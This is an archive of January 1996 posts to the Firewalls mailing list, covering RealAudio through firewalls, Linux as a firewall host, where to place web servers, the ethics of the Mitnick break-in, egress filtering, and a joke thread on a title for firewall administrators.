gatekeeper.Bridge.COM via smap (V1.0mjr) id sma010051; Fri Jan 12 14:30:26 1996 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA01210 (5.67b/IDA-1.5); Fri, 12 Jan 1996 14:43:34 -0600 Date: Fri, 12 Jan 1996 14:43:34 -0600 From: Ken Hardy Message-Id: <199601122043.AA01210@ignatz.bridge.com> To: murrell@bctel.net, firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #14 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brian Murrell spake: >Some points and questions. Real Audio can be handled by a "stateful packet >filter". Firewall-1 have recently put some filtering rules on their Web site >for FW-1 users to add to their rulebase to allow RealAudio in. I checked just >to make sure they weren't opening the big hole. The datastream does seem to >carry the return port in the clear much like FTP's data connection PORT command. Has anyone reverse-enginneered the R/A protocol, or deciphered F/W-1's enhancement (http://www.checkpoint.com/realaudio.html) enough to determine how it can be "safely" supported? And is the protocol proxyable (can know about a gateway), or will it only ever work with a filtering router or transparent proxy? - KH From firewalls-owner Fri Jan 12 15:59:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA13497 for firewalls-outgoing; Fri, 12 Jan 1996 15:35:45 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA13489 for ; Fri, 12 Jan 1996 15:35:36 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id RAA13458 for GreatCircle.COM!Firewalls; Fri, 12 Jan 1996 17:13:08 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA05198; 12 Jan 96 17:05:04 CST (Fri) Received: by sonic.nmti.com; id AA21532; Fri, 12 Jan 1996 16:36:13 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601122236.AA21532@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: mjr@v-one.com Date: Fri, 12 Jan 1996 16:36:13 -0600 (CST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199601122110.QAA08619@clark.net> from "Marcus J. Ranum" at Jan 12, 96 04:10:37 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I think most firewall admins are known by the title: > "Is the Web down?" The one I get is "Is the Internet down?"... From firewalls-owner Fri Jan 12 16:14:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA13579 for firewalls-outgoing; Fri, 12 Jan 1996 15:37:24 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA13572 for ; Fri, 12 Jan 1996 15:37:16 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id RAA13454 for GreatCircle.COM!firewalls; Fri, 12 Jan 1996 17:13:06 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA05138; 12 Jan 96 17:02:59 CST (Fri) Received: by sonic.nmti.com; id AA21434; Fri, 12 Jan 1996 16:34:08 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601122234.AA21434@sonic.nmti.com.nmti.com> Subject: Re: Allow SSL through a firewall? To: jclark@picard.nib.com (Jay R. Clark) Date: Fri, 12 Jan 1996 16:34:08 -0600 (CST) Cc: dwl@hnc.com, firewalls@GreatCircle.COM In-Reply-To: from "Jay R. Clark" at Jan 12, 96 11:02:04 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > In our case we accumulate data from callers for our clients, the data is > confidential/propriatary, if we leave it out on the sacrificial machine > we run the risk of letting 4th parties obtain it and create one hella > liablility problem for ourselfs and for our clients. On the other hand, a web server is a helluva complex thing to have behind the firewall. What if someone compromises it (and I've seen some pretty horrible holes in CGI scripts!)??? Best would be to put it on a separate firewalled subnet off your lobby, so if someone breaks it they don't get carte blanche on your internal net. From firewalls-owner Fri Jan 12 16:56:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA15880 for firewalls-outgoing; Fri, 12 Jan 1996 16:15:36 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA15872 for ; Fri, 12 Jan 1996 16:15:13 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id TAA03011; Fri, 12 Jan 1996 19:14:01 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id TAA16128; Fri, 12 Jan 1996 19:13:37 -0500 (EST) Date: Fri, 12 Jan 1996 19:13:30 -0500 (EST) From: "Paul D. Robertson" To: Kent Landfield cc: Tim Crisall , firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <199601122007.AA21580@ns1.sterling.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Kent Landfield wrote: > > > The mail administrator is "postmaster" > > > The web server admin is "webmaster" > > > Is there such a title for a firewall administrator? > > > And is there a list of these colorful "nom de nets" anywhere? > > > > Guardian Of Data > > Doormat seems more appropriate. ;-) ROTFL! Actually, is there a consensus that adding a mail alias such as gatekeeper@domain.root would server as a useful point of contact device? It seems to me that it wouldn't be a bad thing to have at the domain level, not only to be more up-to-date than the WHOIS database, but also to copy a domain security administrator, who would presumably want to know what's going on when you have to send one of 'those' notes off to root on some box within the domain. Thoughts? Paul "gatekeeper@I'm.not.telling.from.this.account" Robertson ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Jan 12 17:10:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA00665 for firewalls-outgoing; Fri, 12 Jan 1996 16:56:30 -0800 (PST) Received: from ion3.ionet.net (ion3.ionet.net [204.96.200.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA00650 for ; Fri, 12 Jan 1996 16:56:24 -0800 (PST) Received: from tektr.ionet.net (okc-sip152.ionet.net [206.41.129.162]) by ion3.ionet.net (8.6.12/8.6.12) with SMTP id SAA25678 for ; Fri, 12 Jan 1996 18:55:14 -0600 Date: Fri, 12 Jan 1996 18:55:14 -0600 Message-Id: <199601130055.SAA25678@ion3.ionet.net> X-Sender: tektr@ionet.net X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: Tim Richardson Subject: Scalability Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My apologies for posting this in the Firewall news group. Does anyone have information regarding server scalability in respect to total users accessing a system and an increase in bandwidth? I am trying to determine how to represent the future growth plans in our organization as we increase from a single T1 to multiples in order to handle additional customers. I also am trying to determine the growth impact on our web server. (i.e. CPU power, connections, etc.) I cannot find this information anywhere (Of course I am probably not loking in the right place). Any help would be greatly appreciated. Thanks in Advance From firewalls-owner Fri Jan 12 17:25:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA01271 for firewalls-outgoing; Fri, 12 Jan 1996 17:10:20 -0800 (PST) Received: from alphie.lifeguard.com (ALPHIE.LIFEGUARD.COM [199.181.86.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA01266 for ; Fri, 12 Jan 1996 17:10:17 -0800 (PST) Date: Fri, 12 Jan 1996 17:09:13 -0800 (PST) From: Dave Sroelov To: firewalls@greatcircle.com CC: DSROELOV@lifeguard.com Message-Id: <960112170913.17ce6@lifeguard.com> Subject: titles... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i am   lways used to have my id read "Mr. System Manager, Sir" so far, the best idea i have seen is                                      From firewalls-owner Fri Jan 12 17:34:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA16174 for firewalls-outgoing; Fri, 12 Jan 1996 16:21:16 -0800 (PST) Received: from colt.milepost.com (colt.milepost.com [164.57.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA16126 for ; Fri, 12 Jan 1996 16:20:52 -0800 (PST) Received: (from phil@localhost) by colt.milepost.com (8.6.12/8.6.9) id SAA14246; Fri, 12 Jan 1996 18:17:06 -0600 From: Phil Howard Message-Id: <199601130017.SAA14246@colt.milepost.com> Subject: Re: Linux as a firewall To: dana@nav.cc.tx.us (Dana Brewer) Date: Fri, 12 Jan 1996 18:17:05 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dana Brewer writes... > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? Anyone that says Linux is not a true multi-tasking system should not be believed in anything they say. Wanna bet it was a salesman that would profit from your decision to purchase his product instead of rolling your own? I would not even consider whatever product that company sells, now, unless it was just the "opinion" of a particular salesman, in which case if you do decide to buy their product(s), I would find someone else to make the sale with. Anyone that says they don't know if Linux is a true multi-tasking system or not can only be accused of not knowing about Linux. But anyone who is knowledgeable about systems and has examined Linux can only conclude that it is real. IMHO: it's more real that just about anything else out there. What you should be asking is if Linux can be used to solve your Internet security problems. I cannot answer that. Linux can be used to solve some people's problems. But it isn't everything to everyone. There is not an 800 number to call and have a technician fly out that night to come fix your system after it burns itself down. Some manager types that wear ties all day feel all comfy when there is a Tech "Support" line to call. Me, personally, I don't, because I'm the one that has had to call those lines, and stay on hold, and get transferred around, put up with the multi-level menus that don't have anything about my problem, and then get some bozo that can only barely tell you what the next version number is that you need to wait for. I've had SOME of these kinds of problems with the tech "support" line of every company I've ever had to call such numbers from. But then, I'm a technical person, and I know what to do to fix things myself, only if I have the resources to do it with (e.g. original source code that was reasonably written and compilable). In many cases I had to call the 800 number because that is what I was supposed to do, but I ended up given them the solution. But not everyone fits in that category. You have to make the decision yourself about what is appropriate for you. I can reassure you that many people do use Linux for firewalls and are very happy with it. I don't at my day job, but that was what was decided by people higher up before they even knew of Linux. With Linux, you will have to do a lot more yourself. I suggest you get a copy and install it, run it, and play around with it, and see if you feel comfortable with it. You're sure to run into some problems. Try to fix them with the help of people on the comp.os.linux.* newsgroups and see if that works for you. If it does, then give it a shot as a firewall. If not, try something else. Or if it is feasible, try more than one at a time. Good luck. -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! | phil@milepost.com +-------------------------------------------------+ From firewalls-owner Fri Jan 12 17:40:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA01734 for firewalls-outgoing; Fri, 12 Jan 1996 17:25:10 -0800 (PST) Received: from netcom4.netcom.com (netcom4.netcom.com [192.100.81.107]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA01729 for ; Fri, 12 Jan 1996 17:25:06 -0800 (PST) Received: by netcom4.netcom.com (8.6.12/Netcom) id RAA10481; Fri, 12 Jan 1996 17:23:43 -0800 Date: Fri, 12 Jan 1996 17:23:43 -0800 From: yevaud@netcom.com (Karl Wiebe) Message-Id: <199601130123.RAA10481@netcom4.netcom.com> To: Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frederick M Avolio observed: > >On the Gauntlet Firewalls that we install, the management accounts of the >firewall machine go to the firewall manager. > >But I can see, eventually, a need for a well known different term. > >Gee, another thing for the Firewall Product Developers Consortium to talk >about. :-) Quick... get famous. Suggest a standard! > >"gatekeeper" is a fun possibility. "doorman" is too plain. > [ 8< snip! 8< ] Well, at the entrances to Roman villas during the Empire ( and Republic ), a slave was posted ( well, chained to his post! ) who answered the door and announced guests, named after the god Janus, god of doorways, and called the ...janitor. --Karl From firewalls-owner Fri Jan 12 17:55:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA00433 for firewalls-outgoing; Fri, 12 Jan 1996 16:50:17 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA00428 for ; Fri, 12 Jan 1996 16:50:13 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id SAA09748; Fri, 12 Jan 1996 18:49:09 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id SAA09816; Fri, 12 Jan 1996 18:49:09 -0600 Posted-Date: Fri, 12 Jan 1996 18:49:09 -0600 Date: Fri, 12 Jan 1996 18:49:08 -0600 (CST) From: Ron DuFresne To: jeff.aldrich@merrillcorp.com cc: firewalls@GreatCircle.COM Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: <01HZX2RY8G7694FG2L@vpn.stp.mrll.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996 jeff.aldrich@merrillcorp.com wrote: > > A couple of people have mentioned that Mitnick may have been "invited" > and what therefore entraped. Maybe I'm missing something, but I don't > necessarily see how having something left either intentionally or > unintentionally vulnerable constitutes invititation to do damage. > Seems to me like a burglar claiming entrapment because you invited > him/her to steal things when you forgot to lock the door. > > I think entrapment entails actively enticing someone to engage in > specific illegal activity. Cops posing as prostitutes to catch > customers, if done correctly, isn't entrapment. > > On the other hand, had Mr. Shimomura posted messages all over the > Internet saying "Kevin Mitnick is a lamer, who couldn't crack an egg!" > it might be a different story! ;-) (humor alert) > I recall not there being any 'damage' done other than the access and the 'taking' of copies of files that it seems should not have been on this unprotected machine... Now, leaving files, files that would prove to be invaluable not only to security minded admins, but to crackers on an unprotected system, wouldn't that come very close to your: "Kevin Mitnick is a lamer, who couldn't crack an egg!" Only change would be: "see what great tools I have and you don't, come try and get em..." Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Fri Jan 12 18:10:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA04391 for firewalls-outgoing; Fri, 12 Jan 1996 18:06:36 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA04360; Fri, 12 Jan 1996 18:06:27 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 Jan 1996 18:06:45 +0100 To: Ron DuFresne From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 6:49 PM 1/12/96, Ron DuFresne wrote: >I recall not there being any 'damage' done other than the access and the >'taking' of copies of files that it seems should not have been on this >unprotected machine... In other words, because those files (in your opinion) shouldn't have been on that machine, it was OK for someone to break in and take them? Sorry, nice fantasy, but that's not the way the law works. The front door of your home should never be unlocked when the house is unattended. If you go off and forget to lock it on your way out one day, though, that absolutely definitely does NOT mean that it's proper or legal or ethical or anything else for someone to come in and raid your stuff. I think we've about reached the limit of absurdity on this thread; it's no longer particularly relevant to firewalls. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Fri Jan 12 18:25:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA05103 for firewalls-outgoing; Fri, 12 Jan 1996 18:13:03 -0800 (PST) Received: from gatekeeper.nytimes.com (gatekeeper.nytimes.com [199.181.175.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA05080 for ; Fri, 12 Jan 1996 18:12:55 -0800 (PST) Received: from mailgate.nytimes.com by gatekeeper.nytimes.com; (5.65/1.1.8.2/30Mar95-0352PM) id AA17864; Fri, 12 Jan 1996 21:16:51 -0500 Received: by mailgate.nytimes.com; (5.65/1.1.8.2/25Jul94-1134AM) id AA28291; Fri, 12 Jan 1996 21:14:14 -0500 Message-Id: <9601130214.AA28291@mailgate.nytimes.com> To: firewalls@GreatCircle.Com X-Mailer: Post Road Mailer (Green Edition Ver 1.05b) Date: Fri, 12 Jan 1996 21:05:56 EST From: Gordy Thompson Reply-To: Gordy Thompson Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:04 PM 1/11/96 -0800, Bill Curr wrote: > >The mail administrator is "postmaster" >The web server admin is "webmaster" >Is there such a title for a firewall administrator? Maybe it should be Pip, the kid in "Great Expectations" (this from Information Week bwo Edupage:) RESUME BUZZ WORDS FOR '96 Employers of information systems experts in 1996 will be looking for people who know the Internet, client-server computing or networking, according to hiring executives. "IS organizations are looking for people experienced in working with the Internet, particularly regarding security issues and building firewalls," says the CEO of a Santa Monica, Calif. consulting firm. In the client-server area, expertise in C++, Visual Basic and Forte programming is in demand, as well as front-end graphical user interfaces, relational databases and help-desk support. Programmers who otherwise would be in the $50,000 to $60,000 salary category might see an extra $10,000 to $20,000 tacked on for these skills, say some recruiting experts. (Information Week 1 Jan 96 p64) ========================================================================== Gordon T. Thompson gordy@nytimes.com Manager, Internet Services 212 556 1386 The New York Times fax: 212 556 1636 The Times and I have an arrangement: Neither of us speaks for the other. From firewalls-owner Fri Jan 12 19:05:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01674 for firewalls-outgoing; Fri, 12 Jan 1996 12:43:24 -0800 (PST) Received: from bv.com (bv.com [147.182.5.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA01660 for ; Fri, 12 Jan 1996 12:43:18 -0800 (PST) Received: by bv.com; id OAA25471; Fri, 12 Jan 1996 14:37:18 -0600 (CST) Received: by at3038p.kc.bv.com with Microsoft Mail id <30F6E39D@at3038p.kc.bv.com>; Fri, 12 Jan 96 14:41:33 PST From: "Archer, Barry J." To: "'Firewalls Digest'" Subject: Re: "Title for Firewall Admin?" Date: Fri, 12 Jan 96 14:37:00 PST Message-ID: <30F6E39D@at3038p.kc.bv.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Let's carry the dubious(?) thought further: FireMaster Barry From firewalls-owner Fri Jan 12 19:10:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA10354 for firewalls-outgoing; Fri, 12 Jan 1996 18:58:23 -0800 (PST) Received: from mailhost.Ipsilon.COM (foo-5-10.Ipsilon.COM [205.226.5.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA10345 for ; Fri, 12 Jan 1996 18:58:18 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by mailhost.Ipsilon.COM (8.6.11/8.6.10) with SMTP id SAA07434; Fri, 12 Jan 1996 18:56:12 -0800 Message-Id: <199601130256.SAA07434@mailhost.Ipsilon.COM> X-Authentication-Warning: mailhost.Ipsilon.COM: Host localhost didn't use HELO protocol X-Mailer: exmh version 1.6.4 10/10/95 To: yevaud@netcom.com (Karl Wiebe) cc: Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-reply-to: Your message of "Fri, 12 Jan 1996 17:23:43 PST." <199601130123.RAA10481@netcom4.netcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 12 Jan 1996 18:56:11 -0800 From: Craig Anderson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Well, at the entrances to Roman villas during the Empire ( and Republic ), > a slave was posted ( well, chained to his post! ) who answered the door and > announced guests, named after the god Janus, god of doorways, and called the > > ...janitor. > > --Karl Ahh ... when I am asked what I do (usually called system administrator) I have always answered "software janitor". It all makes sense now... Craig From firewalls-owner Fri Jan 12 19:13:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01495 for firewalls-outgoing; Fri, 12 Jan 1996 12:40:37 -0800 (PST) Received: from GateWay (ns.ttl.pactel.com [198.93.131.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01489 for ; Fri, 12 Jan 1996 12:40:32 -0800 (PST) Received: by GateWay (SMI-8.6/SMI-SVR4) id MAA02217; Fri, 12 Jan 1996 12:39:07 -0800 Received: from bigbang(198.93.131.252) by GateWay via smap (V1.3) id sma002210; Fri Jan 12 12:38:42 1996 Received: from [198.93.131.31] by bigbang (SMI-8.6/SMI-SVR4) id MAA17586; Fri, 12 Jan 1996 12:35:34 -0800 X-Sender: dbsmall@bigbang Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Interactive: http://www.ttl.pactel.com/interactive/ Date: Fri, 12 Jan 1996 12:45:52 -0800 To: firewalls@greatcircle.com From: dbsmall@ttl.pactel.com (David B. Small) Subject: Did this hack involve breaching a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Firewallers, I recently received this note about recent exploits of Canadian hackers: Security consultants say computer hackers have breached a leading American satellite TV direct-to-home company's security system to steal programming for decoding signals. (Toronto Financial Post 11 Jan 96 p3) ----------------------------- What I'd like to know is: 1) Did this hack take place across the Internet? 2) What means were taken to secure the satellite TV direct-to-home company's site? (Of course, what I'm getting at, really, is: a) Could this have been prevented? b) Is there something about this that we (firewallers) should be aware of, so that we secure our own sites? (eg, was it hacked through a known method, or something new?) -David From firewalls-owner Fri Jan 12 19:24:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29595 for firewalls-outgoing; Fri, 12 Jan 1996 12:11:26 -0800 (PST) Received: from wittsend.com (wittsend.wittsend.com [130.205.0.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29588 for ; Fri, 12 Jan 1996 12:11:19 -0800 (PST) Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Fri, 12 Jan 96 15:12 EST Message-Id: Subject: Re: Linux as a firewall To: dana@nav.cc.tx.us (Dana Brewer) Date: Fri, 12 Jan 1996 15:12:42 -0500 (EST) From: "Michael H. Warfield" Cc: firewalls@greatcircle.com In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dana Brewer enscribed thusly: > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? HUH? WHAT? Linux is NOT a multitasking operating system? What drugs are they on???? On what, pray tell, do they base such a rash statement? You might as well say UNIX is not a multitasking operating system. On top of that... As has been pointed out several times by others on this list, you do not NEED a multitasking operating system to construct a firewall. Some have built acceptable firewalls with nothing but MS-DOS (just just the PC BIOS) underneath them. Real secure too. Nothing to bust into. So these jerks blew it on two counts with one statement. I don't think I would rely on their advice for anything now. And yes, I do use Linux as the base system for several firewalls at different sites. One of these systems also does WWW and ftp and news and mail as listed above. Yes, before any of the purists on this list chime in, that does compromise the firewall paradigm, but it works and works well for me. Anyone who tells you that Linux is not a true multitasking operating system: 1) Obviously knows nothing about Linux. 2) Probably has no exposure to Linux. 3) Is probably just parroting some party line some told them. 4) Is probably incompetant in may other areas as well. Sounds like someone working for an outfit trying to compete against Linux and is getting the short end of the stick. > ************************************************************************** > Dana Brewer > Director, Computer Center Internet: dana@nav.cc.tx.us > Navarro College Phone : 903-874-6501 > 3200 W. 7th Ave. FAX : 903-874-4636 > Corsicana, TX 75110 > > All opinions stated are my own, and probably don't even vaguely resemble > those of Navarro College. :) > ************************************************************************** > > Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From firewalls-owner Fri Jan 12 19:55:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA15408 for firewalls-outgoing; Fri, 12 Jan 1996 19:43:52 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA15394 for ; Fri, 12 Jan 1996 19:43:47 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id WAA01570; Fri, 12 Jan 1996 22:40:50 -0500 Date: Fri, 12 Jan 1996 22:40:47 -0500 (EST) From: Rabid Wombat To: Karl Wiebe cc: Firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <199601130123.RAA10481@netcom4.netcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > [ 8< snip! 8< ] > > Well, at the entrances to Roman villas during the Empire ( and Republic ), > a slave was posted ( well, chained to his post! ) who answered the door and > announced guests, named after the god Janus, god of doorways, and called the > > ...janitor. > > --Karl > KARL WINS !!!! From firewalls-owner Fri Jan 12 20:10:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA17434 for firewalls-outgoing; Fri, 12 Jan 1996 20:00:39 -0800 (PST) Received: from micron.notcom.com (micron.notcom.com [199.103.241.33]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA17391 for ; Fri, 12 Jan 1996 20:00:26 -0800 (PST) From: Eric Osborne Message-Id: <199601130359.WAA00187@micron.notcom.com> Received: (osborne@localhost) by micron.notcom.com (8.6.12/eo.01) id WAA00187; Fri, 12 Jan 1996 22:59:24 -0500 Subject: Re: Firewalls-Digest V5 #24 To: Firewalls@GreatCircle.COM Date: Fri, 12 Jan 1996 22:59:24 -0500 (EST) In-Reply-To: <199601122016.MAA29959@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 12:16:53 pm MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I understand the value of setting a firewall rule to disallow connections from the outside that claim to have the IP addresses of the internal (local) network, but let me ask you firewall gurus a questions: Is there any {point|feasibility|praticality} to setting something like: deny outgoing packets that are not from the internal net The purpose of this, I would guess, is to prevent people on your network from IP spoofing and hacking other networks. Would this work? ?? eric From firewalls-owner Fri Jan 12 20:25:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA15086 for firewalls-outgoing; Fri, 12 Jan 1996 19:41:15 -0800 (PST) Received: from godzilla.taec.com (godzilla.taec.com [204.162.152.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA15080 for ; Fri, 12 Jan 1996 19:41:10 -0800 (PST) Received: from taec.com by godzilla.taec.com (8.6.12/Toshiba-AEC-RELAY.1) id TAA06157; Fri, 12 Jan 1996 19:40:09 -0800 Received: from borris.sanjose by taec.com (4.1/SMI-4.1) id AA19407; Fri, 12 Jan 96 19:39:37 PST Received: by borris.sanjose (4.1/SMI-4.1) id AA14221; Fri, 12 Jan 96 19:38:07 PST Date: Fri, 12 Jan 96 19:38:07 PST From: ldr@taec.com (Larry Ridenour) Message-Id: <9601130338.AA14221@borris.sanjose> To: firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "firemaster" ????????? HA! HA! > From firewalls-owner@GreatCircle.COM Fri Jan 12 12:17:39 1996 > From: "Tim Crisall" > Organization: Grant MacEwan Community College > To: firewalls@GreatCircle.COM > Date: Fri, 12 Jan 1996 12:18:32 MST > Subject: Re: "Title for Firewall Admin? > X-Mailer: Pegasus Mail v3.22 > Sender: firewalls-owner@GreatCircle.COM > Content-Length: 278 > > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > And is there a list of these colorful "nom de nets" anywhere? > > Guardian Of Data > _ _ _ > > Tim Crisall > Grant MacEwan Community College > From firewalls-owner Fri Jan 12 20:40:42 1996 Received: (majordom@localhost) by miles.greatcircle.com 